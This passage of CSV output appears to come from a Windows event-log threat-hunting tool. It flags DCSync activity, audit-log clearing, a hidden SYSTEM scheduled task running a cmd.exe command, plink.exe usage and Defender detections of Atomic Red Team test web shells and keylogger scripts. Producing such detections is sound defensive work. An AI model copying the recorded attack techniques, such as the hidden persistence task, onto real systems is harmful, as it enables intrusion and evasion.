-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fd
a78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)
%%14675
",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"
5136
0
0
14081
0
0x8020000000000000
198242603
Security
DC1.insecurebank.local
98E50F6A-AE61-4BFF-A9F0-CCFA5CCB555C
-
S-1-5-21-738609754-2819869699-4189121830-1108
bob
insecurebank
0x40f2719
insecurebank.local
%%14676
DC=insecurebank,DC=local
C6FAF700-BFE4-452A-A766-424F84C29583
domainDNS
nTSecurityDescriptor
2.5.5.15
O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fd
a78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)
%%14674
",DC1.insecurebank.local,Security
Audit log cleared,1552907189.911579,2019-03-18T15:06:29.911579+04:00,,Audit,Critical,schedule task created by user,4698,"
4698
0
0
12804
0
0x8020000000000000
566836
Security
WIN-77LTAPHIQ1R.example.corp
S-1-5-21-1587066498-1489273250-1035260531-500
Administrator
EXAMPLE
0x17e2d2
\CYAlyNSS
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<Triggers>
<CalendarTrigger>
<StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary>
<Enabled>true</Enabled>
<ScheduleByDay>
<DaysInterval>1</DaysInterval>
</ScheduleByDay>
</CalendarTrigger>
</Triggers>
<Principals>
<Principal id="LocalSystem">
<UserId>S-1-5-18</UserId>
<RunLevel>HighestAvailable</RunLevel>
<LogonType>InteractiveToken</LogonType>
</Principal>
</Principals>
<Settings>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
<AllowHardTerminate>true</AllowHardTerminate>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>true</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>P3D</ExecutionTimeLimit>
<Priority>7</Priority>
</Settings>
<Actions Context="LocalSystem">
<Exec>
<Command>cmd.exe</Command>
<Arguments>/C tasklist > %windir%\Temp\CYAlyNSS.tmp 2>&1</Arguments>
</Exec>
</Actions>
</Task>
",PC01.example.corp,Security
schedule task created,1552953724.335561,2019-03-19T04:02:04.335561+04:00,,Audit,High,Audit log cleared by user ( user01 ),1102,"
1102
0
4
104
0
0x4020000000000000
432901
Security
PC01.example.corp
S-1-5-21-1587066498-1489273250-1035260531-1106
user01
EXAMPLE
0x18a7875
",WIN-77LTAPHIQ1R.example.corp,Security
network share object was added,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,network share object was added,5142,"
5142
0
0
12808
0
0x8020000000000000
6273
Security
PC04.example.corp
S-1-5-21-3583694148-1414552638-2922671848-1000
IEUser
PC04
0x128a9
\\*\PRINT
c:\windows\system32
",PC04.example.corp,Security
Audit log cleared,1552953724.179623,2019-03-19T04:02:04.179623+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102,"
1102
0
4
104
0
0x4020000000000000
566821
Security
WIN-77LTAPHIQ1R.example.corp
S-1-5-21-1587066498-1489273250-1035260531-500
administrator
EXAMPLE
0x4fd77
",WIN-77LTAPHIQ1R.example.corp,Security
Audit log cleared,1552851030.324836,2019-03-17T23:30:30.324836+04:00,,Audit,Critical,Audit log cleared by user ( administrator ),1102,"
1102
0
4
104
0
0x4020000000000000
6272
Security
PC04.example.corp
S-1-5-21-3583694148-1414552638-2922671848-1000
IEUser
PC04
0x128a9
",PC04.example.corp,Security
Audit log cleared,1552951423.570212,2019-03-19T03:23:43.570212+04:00,,Audit,Critical,Audit log cleared by user ( administrator ),1102,"
1102
0
4
104
0
0x4020000000000000
565591
Security
WIN-77LTAPHIQ1R.example.corp
S-1-5-21-1587066498-1489273250-1035260531-500
administrator
EXAMPLE
0x4fd77
",WIN-77LTAPHIQ1R.example.corp,Security
Audit log cleared,1547969410.645116,2019-01-20T11:30:10.645116+04:00,,Audit,Critical,Audit log cleared by user ( Administrator ),1102,"
1102
0
4
104
0
0x4020000000000000
32950
Security
WIN-77LTAPHIQ1R.example.corp
S-1-5-21-1587066498-1489273250-1035260531-500
Administrator
EXAMPLE
0x35312
",WIN-77LTAPHIQ1R.example.corp,Security
Audit log cleared,1547967656.784849,2019-01-20T11:00:56.784849+04:00,,Audit,Critical,Audit log cleared by user ( Administrator ),1102,"
1102
0
4
104
0
0x4020000000000000
32853
Security
WIN-77LTAPHIQ1R.example.corp
S-1-5-21-1587066498-1489273250-1035260531-500
Administrator
EXAMPLE
0x35312
",WIN-77LTAPHIQ1R.example.corp,Security
Audit log cleared,1600193079.987052,2020-09-15T22:04:39.987052+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102,"
1102
0
4
104
0
0x4020000000000000
161471
Security
MSEDGEWIN10
S-1-5-21-3461203602-4096304019-2269080069-1000
IEUser
MSEDGEWIN10
0x52a7d
",MSEDGEWIN10,Security
Audit log cleared,1552908425.42562,2019-03-18T15:27:05.425620+04:00,,Audit,Critical,Audit log cleared by user ( user01 ),1102,"
1102
0
4
104
0
0x4020000000000000
433307
Security
PC01.example.corp
S-1-5-21-1587066498-1489273250-1035260531-1106
user01
EXAMPLE
0x18a7875
",PC01.example.corp,Security
Suspicious Command or process found in the log,1550081008.338519,2019-02-13T22:03:28.338519+04:00,,Threat,Critical,Found a log contain suspicious command or process ( plink.exe),4688,"
4688
1
0
13312
0
0x8020000000000000
227714
Security
PC01.example.corp
S-1-5-21-1587066498-1489273250-1035260531-1106
user01
EXAMPLE
0x2ed80
0xcfc
C:\Users\user01\Desktop\plink.exe
%%1936
0xe60
",PC01.example.corp,Security
Process running in Unusual location,1550081008.338519,2019-02-13T22:03:28.338519+04:00,,Threat,High,"User Name : ( user01 ) with process : ( C:\Users\user01\Desktop\plink.exe ) run from Unusual location , check the number and date of execution in process execution report",4688,"
4688
1
0
13312
0
0x8020000000000000
227714
Security
PC01.example.corp
S-1-5-21-1587066498-1489273250-1035260531-1106
user01
EXAMPLE
0x2ed80
0xcfc
C:\Users\user01\Desktop\plink.exe
%%1936
0xe60
",PC01.example.corp,Security
Audit log cleared,1550080907.51234,2019-02-13T22:01:47.512340+04:00,,Audit,Critical,Audit log cleared by user ( admin01 ),1102,"
1102
0
4
104
0
0x4020000000000000
227693
Security
PC01.example.corp
S-1-5-21-1587066498-1489273250-1035260531-1108
admin01
EXAMPLE
0xaf855
",PC01.example.corp,Security
connection is initiated using WinRM to this machine - Powershell remoting,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,User (S-1-5-21-738609754-2819869699-4189121830-500) Connected to this machine using WinRM - powershell remote - check eventlog viewer,91,"
91
0
4
9
0
0x4000000000000004
508
Microsoft-Windows-WinRM/Operational
DC1.insecurebank.local
15005
shellId
68007400740070003A002F002F0073006300680065006D00610073002E006D006900630072006F0073006F00660074002E0063006F006D002F007700620065006D002F00770073006D0061006E002F0031002F00770069006E0064006F00770073002F007300680065006C006C002F0063006D0064000000
",DC1.insecurebank.local,Microsoft-Windows-WinRM/Operational
Windows Defender took action against Malware,1563483223.034598,2019-07-19T00:53:43.034598+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Trojan:XML/Exeselrun.gen!A ) , Action ( 6 ) , Category ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117,"
1117
0
4
0
0
0x8000000000000000
106
Microsoft-Windows-Windows Defender/Operational
MSEDGEWIN10
%%827
4.18.1906.3
{8791B1FB-0FE7-412E-B084-524CB5A221F3}
2019-07-18T20:40:13.775Z
2147735426
Trojan:XML/Exeselrun.gen!A
5
Severe
8
Trojan
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:XML/Exeselrun.gen!A&threatid=2147735426&enterprise=0
5
2
3
%%818
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
MSEDGEWIN10\IEUser
file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl
1
%%845
1
%%813
2
%%823
0
6
%%811
0x80508023
The program could not find the malware and other potentially unwanted software on this device.
0
0
No additional actions required
NT AUTHORITY\SYSTEM
AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0
AM: 1.1.16100.4, NIS: 0.0.0.0
",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
Windows Defender took action against Malware,1563483211.952568,2019-07-19T00:53:31.952568+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( High ) , Name ( HackTool:JS/Jsprat ) , Action ( 2 ) , Category ( Tool ) , Path ( containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117,"
1117
0
4
0
0
0x8000000000000000
105
Microsoft-Windows-Windows Defender/Operational
MSEDGEWIN10
%%827
4.18.1906.3
{37522D93-EBDD-4A5B-93B6-E984C9E3FD38}
2019-07-18T20:40:16.697Z
2147708292
HackTool:JS/Jsprat
4
High
34
Tool
https://go.microsoft.com/fwlink/?linkid=37020&name=HackTool:JS/Jsprat&threatid=2147708292&enterprise=0
3
2
3
%%818
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
MSEDGEWIN10\IEUser
containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068)
1
%%845
1
%%813
8
%%862
0
2
%%809
0x00000000
The operation completed successfully.
0
0
No additional actions required
NT AUTHORITY\SYSTEM
AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0
AM: 1.1.16100.4, NIS: 0.0.0.0
",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
Windows Defender took action against Malware,1563483211.905406,2019-07-19T00:53:31.905406+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Trojan:Win32/Sehyioa.A!cl ) , Action ( 2 ) , Category ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117,"
1117
0
4
0
0
0x8000000000000000
104
Microsoft-Windows-Windows Defender/Operational
MSEDGEWIN10
%%827
4.18.1906.3
{F6272F78-9FD1-47D2-B206-89E0F0DCBDB9}
2019-07-18T20:41:40.357Z
2147726426
Trojan:Win32/Sehyioa.A!cl
5
Severe
8
Trojan
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Sehyioa.A!cl&threatid=2147726426&enterprise=0
3
2
3
%%818
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
MSEDGEWIN10\IEUser
file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll
1
%%845
1
%%813
8
%%862
0
2
%%809
0x00000000
The operation completed successfully.
0
0
No additional actions required
NT AUTHORITY\SYSTEM
AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0
AM: 1.1.16100.4, NIS: 0.0.0.0
",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
Windows Defender took action against Malware,1563483211.90261,2019-07-19T00:53:31.902610+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Backdoor:ASP/Ace.T ) , Action ( 2 ) , Category ( Backdoor ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117,"
1117
0
4
0
0
0x8000000000000000
103
Microsoft-Windows-Windows Defender/Operational
MSEDGEWIN10
%%827
4.18.1906.3
{CEF4D8DA-15D6-4667-8E4C-12D19AB4EFED}
2019-07-18T20:40:18.385Z
2147683177
Backdoor:ASP/Ace.T
5
Severe
6
Backdoor
https://go.microsoft.com/fwlink/?linkid=37020&name=Backdoor:ASP/Ace.T&threatid=2147683177&enterprise=0
3
2
3
%%818
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
MSEDGEWIN10\IEUser
file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx
1
%%845
1
%%813
0
%%822
0
2
%%809
0x00000000
The operation completed successfully.
0
0
No additional actions required
NT AUTHORITY\SYSTEM
AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0
AM: 1.1.16100.4, NIS: 0.0.0.0
",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
Windows Defender Found Malware,1563483211.900809,2019-07-19T00:53:31.900809+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( High ) , Name ( HackTool:JS/Jsprat ) , Category ( Tool ) , Path ( containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116,"
1116
0
3
0
0
0x8000000000000000
102
Microsoft-Windows-Windows Defender/Operational
MSEDGEWIN10
%%827
4.18.1906.3
{37522D93-EBDD-4A5B-93B6-E984C9E3FD38}
2019-07-18T20:40:16.697Z
2147708292
HackTool:JS/Jsprat
4
High
34
Tool
https://go.microsoft.com/fwlink/?linkid=37020&name=HackTool:JS/Jsprat&threatid=2147708292&enterprise=0
1
1
3
%%818
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
MSEDGEWIN10\IEUser
containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068)
1
%%845
1
%%813
8
%%862
0
9
%%887
0x00000000
The operation completed successfully.
0
0
No additional actions required
AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0
AM: 1.1.16100.4, NIS: 0.0.0.0
",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
Suspicious Command or process found in the log,1563483110.798994,2019-07-19T00:51:50.798994+04:00,,Threat,Critical,Found a log containing a suspicious PowerShell command ( Get-Keystrokes),1117,"
1117
0
4
0
0
0x8000000000000000
101
Microsoft-Windows-Windows Defender/Operational
MSEDGEWIN10
%%827
4.18.1906.3
{511224D4-1EB4-47B9-BC4A-37E21F923FED}
2019-07-18T20:40:00.580Z
2147725349
Trojan:PowerShell/Powersploit.M
5
Severe
8
Trojan
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Powersploit.M&threatid=2147725349&enterprise=0
103
2
3
%%818
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
MSEDGEWIN10\IEUser
file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1
1
%%845
1
%%813
0
%%822
0
2
%%809
0x80508023
The program could not find the malware and other potentially unwanted software on this device.
0
0
No additional actions required
NT AUTHORITY\SYSTEM
AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0
AM: 1.1.16100.4, NIS: 0.0.0.0
",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
Windows Defender took action against Malware,1563483110.798994,2019-07-19T00:51:50.798994+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Trojan:PowerShell/Powersploit.M ) , Action ( 2 ) , Category ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117,"
1117
0
4
0
0
0x8000000000000000
101
Microsoft-Windows-Windows Defender/Operational
MSEDGEWIN10
%%827
4.18.1906.3
{511224D4-1EB4-47B9-BC4A-37E21F923FED}
2019-07-18T20:40:00.580Z
2147725349
Trojan:PowerShell/Powersploit.M
5
Severe
8
Trojan
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Powersploit.M&threatid=2147725349&enterprise=0
103
2
3
%%818
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
MSEDGEWIN10\IEUser
file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1
1
%%845
1
%%813
0
%%822
0
2
%%809
0x80508023
The program could not find the malware and other potentially unwanted software on this device.
0
0
No additional actions required
NT AUTHORITY\SYSTEM
AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0
AM: 1.1.16100.4, NIS: 0.0.0.0
",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
Windows Defender Found Malware,1563482515.198914,2019-07-19T00:41:55.198914+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Trojan:Win32/Sehyioa.A!cl ) , Category ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116,"
1116
0
3
0
0
0x8000000000000000
95
Microsoft-Windows-Windows Defender/Operational
MSEDGEWIN10
%%827
4.18.1906.3
{F6272F78-9FD1-47D2-B206-89E0F0DCBDB9}
2019-07-18T20:41:40.357Z
2147726426
Trojan:Win32/Sehyioa.A!cl
5
Severe
8
Trojan
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Sehyioa.A!cl&threatid=2147726426&enterprise=0
1
1
3
%%818
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
MSEDGEWIN10\IEUser
file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll
1
%%845
1
%%813
8
%%862
0
9
%%887
0x00000000
The operation completed successfully.
0
0
No additional actions required
